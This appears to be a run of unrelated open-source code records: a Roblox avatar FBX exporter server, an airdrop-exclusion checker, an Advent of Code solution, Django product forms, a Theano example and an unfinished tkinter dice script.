obj.c1 = get_cframe(dm_object.get('C1', CFrame()))\n obj.transform = get_cframe(dm_object.get('Transform', CFrame()))\n elif obj_class == \"Accessory\":\n obj = Accessory()\n obj.attach_point = get_cframe(dm_object.get('AttachPoint', CFrame()))\n else:\n logger.fatal(\"Unknown object type: \" + str(obj_class))\n\n assert obj is not None\n\n obj.name = dm_object.get('Name', None)\n obj.parent = dm_object.get('Parent', None)\n\n assert obj.name is not None\n assert obj.parent is not None\n\n id_to_object[key] = obj\n objects.append(obj)\n\n # 2nd pass - resolve numeric IDs to real references (and build hierarchy)\n root = None\n for obj in objects:\n obj.resolve(id_to_object)\n if obj.parent is None:\n # multi-root objects not supported\n assert root is None\n root = obj\n else:\n obj.parent.children.append(obj)\n\n # 3rd pass - fetch actual data from CDN\n data_cache = dict()\n for obj in objects:\n if isinstance(obj, MeshPart):\n obj.mesh_blob = data_cache.get(obj.mesh_id, None)\n if obj.mesh_blob is None:\n logger.message(\"Fetch mesh: \" + obj.mesh_id)\n obj.mesh_blob, err = fetch_asset(obj.mesh_id)\n data_cache[obj.mesh_id] = obj.mesh_blob\n else:\n logger.message(\" Cached mesh: \" + obj.mesh_id)\n\n obj.texture_blob = data_cache.get(obj.texture_id, None)\n if obj.texture_blob is None:\n logger.message(\" Fetch texture: \" + obj.texture_id)\n obj.texture_blob, err = fetch_asset(obj.texture_id)\n data_cache[obj.texture_id] = obj.texture_blob\n else:\n logger.message(\" Cached texture: \" + obj.texture_id)\n\n return root\n\n\ndef is_close(x, y, r_tol=1.e-5, a_tol=1.e-8):\n return abs(x-y) <= a_tol + r_tol * abs(y)\n\n\ndef get_bone_name_from_m6d(node: Motor6D):\n return node.part1.name\n\n\ndef get_fbx_transform(cframe: CFrame) -> fbx.FbxTransform:\n xform = fbx.FbxTransform()\n xform.px = cframe.tx\n xform.py = cframe.ty\n xform.pz = cframe.tz\n\n # Computing Euler angles from a rotation matrix\n # https://www.gregslabaugh.net/publications/euler.pdf\n # R = Rz(phi) * Ry(theta) * Rx(psi)\n phi = 0.0\n if is_close(cframe.r20, -1.0):\n theta = math.pi / 2.0\n psi = math.atan2(cframe.r01, cframe.r02)\n elif is_close(cframe.r20, 1.0):\n theta = -math.pi / 2.0\n psi = math.atan2(-cframe.r01, -cframe.r02)\n else:\n theta = -math.asin(cframe.r20)\n cos_theta = math.cos(theta)\n psi = math.atan2(cframe.r21 / cos_theta, cframe.r22 / cos_theta)\n phi = math.atan2(cframe.r10 / cos_theta, cframe.r00 / cos_theta)\n\n xform.rx = math.degrees(psi)\n xform.ry = math.degrees(theta)\n xform.rz = math.degrees(phi)\n\n xform.sx = 1.0\n xform.sy = 1.0\n xform.sz = 1.0\n return xform\n\n\ndef load_mesh(file_name: str) -> rbmesh.Mesh or None:\n mesh_handle = open(file_name, 'rb')\n mesh_payload = mesh_handle.read()\n mesh_handle.close()\n mesh = rbmesh.parse_mesh(mesh_payload)\n return mesh\n\n\ndef load_mesh_as_fbx_geo(file_name: str, cframe: CFrame):\n mesh = load_mesh(file_name)\n mesh_transform_vertices(mesh, cframe)\n geo = rbmesh.convert_mesh_to_fbx_geometry(mesh, 0)\n return geo\n\n\ndef get_texture_name(url: str):\n texture_name = \"url_resolve_error\"\n\n if url.startswith('rbxassetid://'):\n texture_name = url[13:]\n elif url.startswith('https://www.roblox.com/asset/?id='):\n texture_name = url[33:]\n elif url.startswith('http://www.roblox.com/asset/?id='):\n texture_name = url[32:]\n elif url.startswith('http://roblox.com/asset/?id='):\n texture_name = url[28:]\n\n texture_name = texture_name.replace(\" \", \"\")\n texture_name = texture_name.replace(\"/\", \"\")\n texture_name = texture_name.replace(\"\\\\\", \"\")\n texture_name = texture_name.replace(\"?\", \"\")\n texture_name = texture_name.replace(\"%\", \"\")\n texture_name = texture_name.replace(\"*\", \"\")\n texture_name = texture_name.replace(\":\", \"\")\n texture_name = texture_name.replace(\"|\", \"\")\n texture_name = texture_name.replace('\"', \"\")\n texture_name = texture_name.replace('<', \"\")\n texture_name = texture_name.replace('>', \"\")\n texture_name = texture_name.replace('.', \"\")\n texture_name = texture_name.replace('@', \"\")\n return texture_name\n\n\ndef append_to_fbx(doc, node, fbx_parent_id: int, desc: SceneDescription):\n # noinspection PyUnusedLocal\n fbx_id = 0\n if isinstance(node, MeshPart):\n logger.message(\"FBX Mesh: \" + node.name)\n logger.message(\" geo: \" + node.mesh_id)\n logger.message(\" img: \" + node.texture_id)\n\n xform = get_fbx_transform(node.cframe)\n\n mesh = None\n if node.mesh_blob is None:\n if node.mesh_type == \"Head\":\n mesh = load_mesh(\"./built-in/sm_head.mesh\")\n scale_xz = min(node.scale_x, node.scale_z)\n node.scale_x = scale_xz\n node.scale_z = scale_xz\n node.scale_x = node.scale_x / 1.25\n node.scale_y = node.scale_y / 1.25\n node.scale_z = node.scale_z / 1.25\n elif node.mesh_type == \"Sphere\":\n mesh = load_mesh(\"./built-in/sm_sphere.mesh\")\n node.scale_x = node.scale_x / 1.45\n node.scale_y = node.scale_y / 1.45\n node.scale_z = node.scale_z / 1.45\n else:\n mesh_payload = node.mesh_blob[\"payload\"]\n mesh = rbmesh.parse_mesh(mesh_payload)\n\n if mesh is None:\n fbx_id = doc.create_locator(node.name, xform, fbx_parent_id)\n else:\n mat_id, mat_name = doc.create_material(node.name + \"Mat\", fbx.FbxColor4(1, 1, 1, 1))\n\n texture_file_name = \"empty.png\"\n if node.texture_blob is not None:\n texture_payload = node.texture_blob[\"payload\"]\n\n texture_hash = hashlib.sha256(texture_payload).hexdigest()\n\n texture_ext = detect_asset_type(texture_payload)\n # texture_name = get_texture_name(node.texture_id)\n texture_name = str(texture_hash)\n texture_file_name = texture_name + \".\" + texture_ext\n\n full_texture_file_name = desc.textures_folder + texture_file_name\n ensure_path_exist(full_texture_file_name)\n dest_file = open(full_texture_file_name, 'wb')\n dest_file.write(texture_payload)\n dest_file.close()\n\n doc.create_texture(node.name + \"Tex\", texture_file_name, mat_id)\n mesh_transform_vertices(mesh, cframe_rotation_y(3.14159),\n node.offset_x, node.offset_y, node.offset_z,\n node.scale_x, node.scale_y, node.scale_z)\n\n geo = rbmesh.convert_mesh_to_fbx_geometry(mesh, 0)\n fbx_id = doc.create_mesh(node.name, xform, geo, mat_id, fbx_parent_id)\n\n doc.connect_objects(fbx_id, desc.geos_layer_id)\n elif isinstance(node, Bone):\n logger.message(\"FBX Bone: \" + node.name)\n xform = get_fbx_transform(node.cframe)\n if node.cframe_local is not None:\n xform = get_fbx_transform(node.cframe_local)\n fbx_id = doc.create_bone(node.name, xform, fbx_parent_id)\n\n doc.connect_objects(fbx_id, desc.bones_layer_id)\n elif isinstance(node, Attachment):\n logger.message(\"FBX Attachment: \" + node.name)\n xform = get_fbx_transform(node.cframe)\n if node.geo is None:\n fbx_id = doc.create_locator(node.name, xform, fbx_parent_id)\n else:\n fbx_id = doc.create_mesh(node.name, xform, node.geo, desc.attachments_material_id, fbx_parent_id)\n\n doc.connect_objects(fbx_id, desc.attachments_layer_id)\n else:\n logger.message(\"FBX Group: \" + node.name)\n fbx_id = doc.create_group(node.name, fbx_parent_id)\n\n for child in node.children:\n append_to_fbx(doc, child, fbx_id, desc)\n\n return\n\n\ndef _get_linearized_tree_recursive(res: list, node: Instance):\n res.append(node)\n for child in node.children:\n _get_linearized_tree_recursive(res, child)\n\n\ndef get_linearized_tree(root: Instance) -> list:\n res = list()\n res.append(root)\n\n for child in root.children:\n _get_linearized_tree_recursive(res, child)\n\n return res\n\n\ndef mesh_transform_vertices(mesh: rbmesh.Mesh, cframe: CFrame,\n ox: float = 0, oy: float = 0, oz: float = 0,\n sx: float = 1, sy: float = 1, sz: float = 1):\n\n for vertex in mesh.vertices:\n x = (vertex.p_x + ox) * sx\n y = (vertex.p_y + oy) * sy\n z = (vertex.p_z + oz) * sz\n vertex.p_x, vertex.p_y, vertex.p_z = cframe_transform_pos(cframe, x, y, z)\n nx = vertex.n_x\n ny = vertex.n_y\n nz = vertex.n_z\n vertex.n_x, vertex.n_y, vertex.n_z = cframe_transform_vec(cframe, nx, ny, nz)\n\n return\n\n\ndef export_roblox_model(model_desc) -> str:\n root = parse_model_desc(model_desc)\n # logger.message(str(root))\n\n file_folder = \"./Avatars/\" + root.name + \"/\"\n file_name = file_folder + root.name + \".fbx\"\n\n rot_y_180 = cframe_rotation_y(3.14159)\n spike_pivot = cframe_translation(0, 0.5, 0)\n\n logger.message(\"Create FBX...\")\n doc = fbx.FbxDocument(file_name)\n sphere_geo = load_mesh_as_fbx_geo(\"./built-in/sphere.mesh\", rot_y_180)\n spike_geo = load_mesh_as_fbx_geo(\"./built-in/spike.mesh\", cframe_multiply(rot_y_180, spike_pivot))\n\n scene_desc = SceneDescription()\n scene_desc.textures_folder = file_folder\n scene_desc.attachments_material_id, _ = doc.create_material(\"AttachmentMat\", fbx.FbxColor4(1, 0.8, 0.8, 1))\n scene_desc.attachments_layer_id = doc.create_layer(\"Attachments\", fbx.FbxColor4(1, 0, 0))\n scene_desc.bones_layer_id = doc.create_layer(\"Bones\", fbx.FbxColor4(0, 0, 1))\n scene_desc.geos_layer_id = doc.create_layer(\"Geos\", fbx.FbxColor4(0, 1, 0))\n scene_desc.accs_layer_id = doc.create_layer(\"Accs\", fbx.FbxColor4(1, 1, 0))\n\n root_primary_part = None\n scene_center_cframe = CFrame()\n if root.primary_part is not None:\n root_primary_part = root.primary_part\n scene_center_cframe = root.primary_part.cframe\n\n assert root_primary_part is not None\n\n # Accessories handler\n accessories = list()\n for child in root.children:\n if isinstance(child, Accessory):\n child.parent = None\n accessories.append(child)\n logger.message(\"Accessory: \" + child.name)\n for accessory in accessories:\n root.children.remove(accessory)\n\n # convert part based rig (Motor6Ds) to bone based\n nodes = get_linearized_tree(root)\n\n # Step 0. Cover a special case, in R15 case everything should be centered around LowerTorso\n for node in nodes:\n if isinstance(node, Motor6D) and node.name == \"Root\":\n scene_center_cframe = cframe_multiply(node.part0.cframe, node.c0)\n break\n\n scene_center_cframe_inv = cframe_inverse(scene_center_cframe)\n\n # Step 1. Center the scene\n logger.message(\"1. Center scene\")\n for node in nodes:\n if isinstance(node, Part) or isinstance(node, MeshPart) or isinstance(node, Bone):\n node.cframe = cframe_multiply(scene_center_cframe_inv, node.cframe)\n\n # Step 2. Generate bones from motor6Ds\n logger.message(\"2. Generate bones\")\n bones = list()\n\n humanoid_root_bone = Bone()\n humanoid_root_bone.name = \"HumanoidRootNode\"\n humanoid_root_bone.parent = None\n humanoid_root_bone.cframe = CFrame()\n humanoid_root_bone.cframe_local = CFrame()\n humanoid_root_bone.m6d = None\n bones.append(humanoid_root_bone)\n\n for node in nodes:\n # skip HumanoidRootPart\n if node == root_primary_part:\n continue\n\n if isinstance(node, Motor6D):\n bone = Bone()\n bone.name = get_bone_name_from_m6d(node)\n bone.parent = None\n bone.m6d = node\n #\n # these two matrices below are equal\n # get_fbx_transform(cframe_multiply(node.part1.cframe, node.c1))\n # get_fbx_transform(cframe_multiply(node.part0.cframe, node.c0))\n bone.cframe = cframe_roblox_to_maya(cframe_multiply(node.part0.cframe, node.c0))\n bones.append(bone)\n\n # Step 3. Rename geos\n logger.message(\"3. Rename geos\")\n for node in nodes:\n if isinstance(node, Part) or isinstance(node, MeshPart):\n node.name = node.name + \"_Geo\"\n\n # Step 4. Reconstruct hierarchy\n logger.message(\"4. Build hierarchy\")\n already_connected_parts = dict()\n already_connected_parts[root_primary_part] = humanoid_root_bone\n\n bones_to_process = list()\n while True:\n bones_to_process.clear()\n for bone in bones:\n # ignore already processed bones\n if bone.m6d is None:\n continue\n\n parent_bone0 = already_connected_parts.get(bone.m6d.part0, None)\n parent_bone1 = already_connected_parts.get(bone.m6d.part1, None)\n\n child_part = None\n parent_bone = None\n if parent_bone0 is not None:\n assert parent_bone1 is None\n parent_bone = parent_bone0\n child_part = bone.m6d.part1\n\n if parent_bone1 is not None:\n assert parent_bone0 is None\n parent_bone = parent_bone1\n child_part = bone.m6d.part0\n\n if parent_bone is None:\n continue\n\n bones_to_process.append((parent_bone, child_part, bone))\n\n for parent_bone, child_part, child_bone in bones_to_process:\n logger.message(parent_bone.name + \" -> \" + child_bone.name + \"/\" + child_part.name)\n child_bone.m6d = None\n child_bone.parent = parent_bone\n parent_bone.children.append(child_bone)\n child_bone.cframe_local = cframe_multiply(cframe_inverse(parent_bone.cframe), child_bone.cframe)\n already_connected_parts[child_part] = child_bone\n\n number_of_bones_to_process = 0\n for bone in bones:\n if bone.m6d is not None:\n number_of_bones_to_process += 1\n\n if number_of_bones_to_process == 0:\n break\n\n # Step 6. Rotate by 180 degree and add root bones to the FBX scene\n for node in nodes:\n if isinstance(node, Attachment):\n # from Roblox local space to Maya world space\n node.cframe = cframe_roblox_to_maya(cframe_multiply(node.parent.cframe, node.cframe))\n\n for node in nodes:\n if isinstance(node, Part) or isinstance(node, MeshPart):\n # from Roblox world space to Maya world space\n node.cframe = cframe_roblox_to_maya(node.cframe)\n\n # Step 7. Attach mesh part to corresponding bones\n # a) built attachments list\n geom_to_attachments = dict()\n for node in nodes:\n if isinstance(node, Attachment) and not node.name.endswith(\"RigAttachment\"):\n if node.name.endswith(\"Attachment\"):\n node.name = node.name[:-10] + \"_Att\"\n\n parent_geo_name = node.parent.name\n geo_attachments = geom_to_attachments.get(parent_geo_name, None)\n if not geo_attachments:\n geo_attachments = list()\n geom_to_attachments[parent_geo_name] = geo_attachments\n\n geo_attachments.append(node)\n\n # b) destroy existing hierarchy (unlink)\n for node in nodes:\n node.children.clear()\n node.parent = None\n\n # c) add geo/attachments to corresponding bones\n for bone in bones:\n part_name = bone.name + \"_Geo\"\n for node in nodes:\n if node.name == part_name and (isinstance(node, Part) or isinstance(node, MeshPart)):\n node.cframe = cframe_multiply(cframe_inverse(bone.cframe), node.cframe)\n node.parent = bone\n bone.children.append(node)\n\n geo_attachments = geom_to_attachments.get(part_name, None)\n if geo_attachments:\n for attachment in geo_attachments:\n\n if attachment.name == \"LeftGrip_Att\" or attachment.name == \"RightGrip_Att\":\n #\n # https://developer.roblox.com/en-us/articles/using-avatar-importer\n #\n # The LeftGrip_Att and RightGrip_Att attachments have a 90 deg rotation on the X axis.\n # In short, their rotation should be (90, 0, 0).\n #\n attachment.cframe = cframe_multiply(attachment.cframe, cframe_rotation_x(3.14159))\n attachment.geo = spike_geo\n else:\n attachment.geo = sphere_geo\n\n attachment.cframe = cframe_multiply(cframe_inverse(bone.cframe), attachment.cframe)\n attachment.parent = bone\n bone.children.append(attachment)\n\n root_bone_id = doc.create_bone(\"Root\", fbx.FbxTransform())\n doc.connect_objects(root_bone_id, scene_desc.bones_layer_id)\n\n root_att_id = doc.create_mesh(\"Root_Att\", fbx.FbxTransform(),\n sphere_geo, scene_desc.attachments_material_id, root_bone_id)\n doc.connect_objects(root_att_id, scene_desc.attachments_layer_id)\n\n append_to_fbx(doc, humanoid_root_bone, root_bone_id, scene_desc)\n\n if len(accessories) > 0:\n accessories_id = doc.create_group(\"Accessories\")\n doc.connect_objects(accessories_id, scene_desc.accs_layer_id)\n for accessory in accessories:\n accessory_name = accessory.name\n if accessory_name.endswith(\"Accessory\"):\n accessory_name = accessory_name[:-9] + \"_Acc\"\n\n accessory_nodes = get_linearized_tree(accessory)\n\n # move attachments to world space\n for accessory_node in accessory_nodes:\n if isinstance(accessory_node, Attachment) and accessory_node.parent is not None:\n accessory_node.cframe = cframe_multiply(accessory_node.parent.cframe, accessory_node.cframe)\n\n # destroy existing hierarchy\n for accessory_node in accessory_nodes:\n accessory_node.children.clear()\n accessory_node.parent = None\n\n root_accessory_id = doc.create_group(accessory_name, accessories_id)\n\n for accessory_node in accessory_nodes:\n if isinstance(accessory_node, MeshPart):\n # Center accessory\n accessory_node.cframe = cframe_multiply(scene_center_cframe_inv, accessory_node.cframe)\n # from Roblox world space to Maya world space\n accessory_node.cframe = cframe_roblox_to_maya(accessory_node.cframe)\n append_to_fbx(doc, accessory_node, root_accessory_id, scene_desc)\n\n if isinstance(accessory_node, Attachment):\n accessory_node.geo = sphere_geo\n\n # Center accessory\n accessory_node.cframe = cframe_multiply(scene_center_cframe_inv, accessory_node.cframe)\n # from Roblox world space to Maya world space\n accessory_node.cframe = cframe_roblox_to_maya(accessory_node.cframe)\n\n append_to_fbx(doc, accessory_node, root_accessory_id, scene_desc)\n\n text = doc.finalize()\n\n logger.message(\"Save FBX '\" + file_name + \"'\")\n ensure_path_exist(file_name)\n file_handle = open(file_name, 'w+')\n file_handle.write(text)\n file_handle.close()\n\n return \"Saved file:\" + file_name\n\n\nclass ForgeHTTPArtServerRequestHandler(BaseHTTPRequestHandler):\n\n # noinspection PyPep8Naming\n def do_POST(self):\n\n content_length = int(self.headers['Content-Length'])\n body = self.rfile.read(content_length).decode('utf-8')\n\n model_description = json.loads(body)\n # result = fetch_roblox_model_to_disk(model_description)\n result = export_roblox_model(model_description)\n\n self.send_response(200)\n\n # Send headers\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n # Write content as utf-8 data\n self.wfile.write(bytes(result, \"utf8\"))\n return\n\n # noinspection PyPep8Naming\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n\n response = \"{\"\n\n # add accessories\n accessories_file = open('./accessories.txt', 'r')\n if accessories_file:\n response += '\"accessories\": ['\n lines = accessories_file.readlines()\n need_comma = False\n for line in lines:\n ln = line.rstrip()\n if not ln.isdigit():\n continue\n if need_comma:\n response += \", \"\n response += ln\n need_comma = True\n response += '], '\n else:\n logger.warn(\"Can't open accessories.txt\")\n\n # add heads\n heads_file = open('./heads.txt', 'r')\n if heads_file:\n response += '\"heads\": ['\n lines = heads_file.readlines()\n need_comma = False\n for line in lines:\n ln = line.rstrip()\n if not ln.isdigit():\n continue\n if need_comma:\n response += \", \"\n response += ln\n need_comma = True\n response += '], '\n else:\n logger.warn(\"Can't open heads.txt\")\n\n # add bundles\n bundles_file = open('./bundles.txt', 'r')\n if bundles_file:\n response += '\"bundles\": ['\n lines = bundles_file.readlines()\n need_comma = False\n for line in lines:\n ln = line.rstrip()\n if not ln.isdigit():\n continue\n if need_comma:\n response += \", \"\n response += ln\n need_comma = True\n response += ']'\n else:\n logger.warn(\"Can't open bundles.txt\")\n\n response += \"}\"\n self.wfile.write(bytes(response, \"utf8\"))\n return\n\n\ndef signal_handler(_signal, _frame):\n logger.message('\\nAvatar FBX Exporter Server closed by user request.')\n sys.exit(0)\n\n\ndef main():\n if sys.version_info[0] != 3:\n logger.fatal(\"Python3 required\")\n\n signal.signal(signal.SIGINT, signal_handler)\n\n server_address = ('127.0.0.1', 49999)\n\n httpd = HTTPServer(server_address, ForgeHTTPArtServerRequestHandler)\n logger.message('Roblox Avatar FBX Exporter Server \"{0}:{1}\"'.format(server_address[0], server_address[1]))\n logger.message('by Sergey Makeev\\n')\n logger.message('Press Ctrl+C to exit')\n httpd.serve_forever()\n\n\nmain()\n","repo_name":"SergeyMakeev/RobloxAvatarExporter","sub_path":"FbxExporterServer.py","file_name":"FbxExporterServer.py","file_ext":"py","file_size_in_byte":38233,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"34543410133","text":"\"\"\"Check which of our users were included in the paraswap list.\"\"\"\n\nimport csv\n\nINPUT_FILE = \"included.csv\"\nPARASWAP_INCLUDED = \"paraswap.txt\"\nOUTPUT_FILE = \"paraswap_excluded.csv\"\n\n\ndef main():\n paraswap_accs = load_paraswap()\n para_excluded = []\n\n with open(INPUT_FILE) as f:\n reader = csv.reader(f)\n assert len(next(reader)) == 4\n\n for _, wallet_address, eoa_address, trans_hash in reader:\n if (\n wallet_address.lower() not in paraswap_accs\n and eoa_address.lower() not in paraswap_accs\n ):\n para_excluded.append((wallet_address, eoa_address, trans_hash))\n\n if para_excluded:\n with open(OUTPUT_FILE, \"w\") as f:\n writer = csv.writer(f)\n writer.writerow([\"wallet_address\", \"eoa_address\", \"transaction_hash\"])\n writer.writerows(para_excluded)\n print(f\"wrote excluded users to {OUTPUT_FILE}\")\n else:\n print(\"all users present and accounted for\")\n\n\ndef load_paraswap():\n with open(PARASWAP_INCLUDED) as f:\n return set(l.strip().lower() for l in f.readlines())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dharmaprotocol/excluded-uni-airdrop-users","sub_path":"projects/Monolith/check_paraswap.py","file_name":"check_paraswap.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"3127790591","text":"def get_seat_number(letters, begin=0, end=None):\r\n if end == None: end = 2**(len(letters)) - 1 # first call of func\r\n\r\n if len(letters) == 1: # shall we stop\r\n if letters[0] in ['F', 'L']:\r\n return begin\r\n elif letters[0] in ['B', 'R']:\r\n return end\r\n # calculate the middle\r\n middle = (end - begin + 1) // 2\r\n # And then take lower(F|L) or upper(B|R) part\r\n direction = letters.pop(0)\r\n if direction in ['F', 'L']:\r\n end = begin + middle - 1\r\n elif direction in ['B', 'R']:\r\n begin = begin + middle\r\n return get_seat_number(letters, begin, end)\r\n\r\n\r\ndef strip_seats(seats): # for task2\r\n '''\r\n Technically, not the best way of doing it...\r\n We'll just remove 'very front' seats\r\n '''\r\n if seats[1] - seats[0] == 1: return strip_seats(seats[1:])\r\n return seats[1]\r\n\r\n\r\ndef exercise():\r\n f = open(\"ex5.txt\", \"rt\")\r\n lines = f.read().strip().split()\r\n f.close()\r\n\r\n highest_seat_number = 0 # for task1\r\n total_seats = list(range(0, 1024)) # for task2. All seats\r\n\r\n for line in lines:\r\n row_letters = line[:7]\r\n col_letters = line[-3:]\r\n row = get_seat_number(list(row_letters))\r\n col = get_seat_number(list(col_letters))\r\n seat = row * 8 + col\r\n if seat > highest_seat_number: highest_seat_number = seat\r\n total_seats.remove(seat) # for task 2\r\n\r\n print(f\"The highest seat: {highest_seat_number}\")\r\n print(\"My seat:\", strip_seats(total_seats))\r\n\r\n\r\nexercise()\r\n","repo_name":"stels17/AdventOfCode2020","sub_path":"day5/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16311593569","text":"from django import forms\nfrom apps.products.models import OcProduct, OcProductDescriptionBase, OcProductDescription, OcProductToStore, \\\n OcProductToCategory, OcTsgProductVariantCore, OcTsgProductVariants\n\nfrom apps.options.models import OcTsgProductVariantCoreOptions, OcTsgProductVariantOptions\n\nfrom tinymce.widgets import TinyMCE\n\n\nclass ProductForm(forms.ModelForm):\n\n class Meta:\n model = OcProduct\n\n fields = ['product_id', 'supplier', 'status', 'mib_logo', 'tax_class']\n\n labels = {\n 'mib_logo': 'Made in Britain',\n 'status': 'Product is visable',\n }\n\n\nclass ProductDescriptionBaseForm(forms.ModelForm):\n description = forms.CharField(widget=TinyMCE(attrs={'rows': 10}))\n long_description = forms.CharField(widget=TinyMCE(attrs={'rows': 20}))\n sign_reads = forms.CharField(widget=TinyMCE(attrs={'rows': 10}))\n\n class Meta:\n model = OcProductDescriptionBase\n\n fields = '__all__'\n\n widgets = {\n 'product': forms.HiddenInput,\n\n }\n\n labels = {\n 'mib_logo': 'Made in Britain',\n }\n\n\nclass SiteProductDetailsForm(forms.ModelForm):\n description = forms.CharField(widget=TinyMCE(attrs={'rows': 10}), required=False)\n long_description = forms.CharField(widget=TinyMCE(attrs={'rows': 20}), required=False)\n sign_reads = forms.CharField(widget=TinyMCE(attrs={'rows': 10}), required=False)\n\n class Meta:\n model = OcProductToStore\n\n fields = '__all__'\n\n labels = {\n 'status': 'Product is visible',\n }\n\n widgets = {\n 'product': forms.HiddenInput,\n 'store': forms.HiddenInput,\n\n }\n\n\nclass ProductCategoryForm(forms.ModelForm):\n class Meta:\n model = OcProductToCategory\n fields = '__all__'\n\n labels = {\n 'status': 'Product is visible',\n }\n\n widgets = {\n 'product': forms.HiddenInput,\n 'category_store': forms.HiddenInput,\n\n }\n\n\nclass VariantCoreOptionsForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariantCoreOptions\n fields = '__all__'\n\n widgets = {\n 'product_variant': forms.HiddenInput\n }\n\n\nclass VariantCoreOptionsOrderForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariantCoreOptions\n fields = '__all__'\n\n widgets = {\n 'product_variant': forms.HiddenInput,\n 'option_value': forms.HiddenInput,\n 'option_class': forms.HiddenInput,\n }\n\n labels = {\n 'order_by': 'New order position',\n }\n\n\nclass VariantCoreForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariantCore\n fields = '__all__'\n\n widgets = {\n 'product': forms.HiddenInput,\n 'prod_variant_core_id': forms.HiddenInput,\n 'size_material': forms.HiddenInput,\n\n }\n\n labels = {\n 'exclude_fpnp': 'Exclude from Free Shipping',\n 'shipping_cost': 'Cost for this Shipping',\n 'gtin': 'GTIN',\n 'bl_live': 'LIVE',\n }\n\nclass VariantCoreEditForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariantCore\n fields = '__all__'\n\n widgets = {\n 'product': forms.HiddenInput,\n 'prod_variant_core_id': forms.HiddenInput,\n 'size_material': forms.HiddenInput,\n\n }\n\n labels = {\n 'exclude_fpnp': 'Exclude from Free Shipping',\n 'shipping_cost': 'Cost for this Shipping',\n 'gtin': 'GTIN ',\n 'bl_live': 'LIVE',\n }\n\n\n\nclass SiteVariantOptionsForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariantOptions\n fields = '__all__'\n\n widgets = {\n 'product_variant': forms.HiddenInput,\n 'product_var_core_option': forms.HiddenInput\n }\n\n labels = {\n 'order_by': 'New order position',\n }\n\n\nclass SiteProductVariantForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariants\n fields = '__all__'\n\n widgets = {\n 'prod_var_core_id': forms.HiddenInput,\n 'store': forms.HiddenInput,\n 'digital_artwork': forms.HiddenInput,\n 'digital_artwork_price': forms.HiddenInput,\n 'digital_artwork_def': forms.HiddenInput,\n 'isdeleted': forms.HiddenInput,\n }\n\n\n","repo_name":"simonfroggatt/medusa","sub_path":"apps/products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39656868796","text":"\r\ndef factors(x):\r\n '''Returns the number of divisors of x'''\r\n factors = 0\r\n for factor in range(1,int(x**(1/2))+1):\r\n if x%factor == 0:\r\n factors+=2\r\n if factor**2 ==x:\r\n factors-=1\r\n return(factors)\r\n \r\ndef triangle(x):\r\n '''Returns the sum of the first x integers'''\r\n return(int(x*(x+1)/2))\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\ndef trianglenumbers(fac):\r\n '''Returns the first triangle number with over 500 divisors'''\r\n '''A triangle number is the sum of the first n natural numebers'''\r\n '''Example the 3rd triangle number is 6'''\r\n on = True\r\n n = 1\r\n while on:\r\n if factors(triangle(n)) > fac:\r\n on = False\r\n else:\r\n n += 1\r\n return(triangle(n))\r\n\r\ntrianglenumbers(500)\r\n\r\n \r\n","repo_name":"justinmyersdata/ProjectEuler","sub_path":"12_Project_Euler.py","file_name":"12_Project_Euler.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10852052895","text":"import theano\nfrom theano import tensor\n\n# declare variable types (floating-point scalars)\n#scalar is quantity (numerical value)\na = tensor.dscalar()\nb = tensor.dscalar()\n\n# create a symbolic expression\nc = a + b\n# create the function with 1 : parameters, 2:symbolic expression\nf = theano.function([a,b],c)\n\nresult = f(1.5,2.5)\nprint (result)","repo_name":"Khallil/Machine_Learning_Practice","sub_path":"ML_Code/deep_learning/framework_practice/theano/theano_example.py","file_name":"theano_example.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5425871127","text":"import random\nimport tkinter as tk\nfrom tkinter import *\n\n\nroot = tk.Tk()\ncanvas = tk.Canvas(root,\n width=400,\n height=600,\n borderwidth=0,\n highlightthickness=0,\n bg=\"black\")\ncanvas.grid()\n\n\ndef potvrdenie():\n list_random_cisel = []\n pocet = input_loop.get()\n print(f\"pocet {pocet}\")\n\n for x in range(int(pocet)):\n random_value = random.randint(1, 6)\n print(random_value)\n list_random_cisel.append(random_value)\n\n vypocet(list_random_cisel)\n\n\ndef vypocet(list_random_cisel):\n for iterator_aktual in list_random_cisel:\n root.after(1000, update_text(iterator_aktual))\n\n\ndef update_text(iterator_aktual):\n text_list = [\"text_1\",\n \"text_2\",\n \"text_3\",\n \"text_4\",\n \"text_5\",\n \"text_6\"]\n\n text_list2 = [text_1,\n text_2,\n text_3,\n text_4,\n text_5,\n text_6]\n\n canvas.itemconfigure(text_aktualne, text=iterator_aktual)\n for x in range(0, len(text_list)):\n if int(iterator_aktual) == int(text_list[x][5:]):\n print(iterator_aktual)\n canvas.insert(text_list2[x], tk.END, \"*\")\n canvas.update()\n\n\ndef _kruh(self, x, y, r, **kwargs):\n return self.create_oval(x - r, y - r, x + r, y + r, **kwargs)\n\n\ndef _text(self, x, y, **kwargs):\n return self.create_text(x, y, **kwargs)\n\n\ntk.Canvas.kruh = _kruh\ntk.Canvas.text = _text\n\nkruh = canvas.kruh(200, 200, 100, fill=\"#fff\", width=0)\ntext_aktualne = canvas.text(200, 200, text=\"\")\ntext_1 = canvas.text(200, 410, text=\"1: \", fill=\"white\")\ntext_2 = canvas.text(200, 430, text=\"2: \", fill=\"white\")\ntext_3 = canvas.text(200, 450, text=\"3: \", 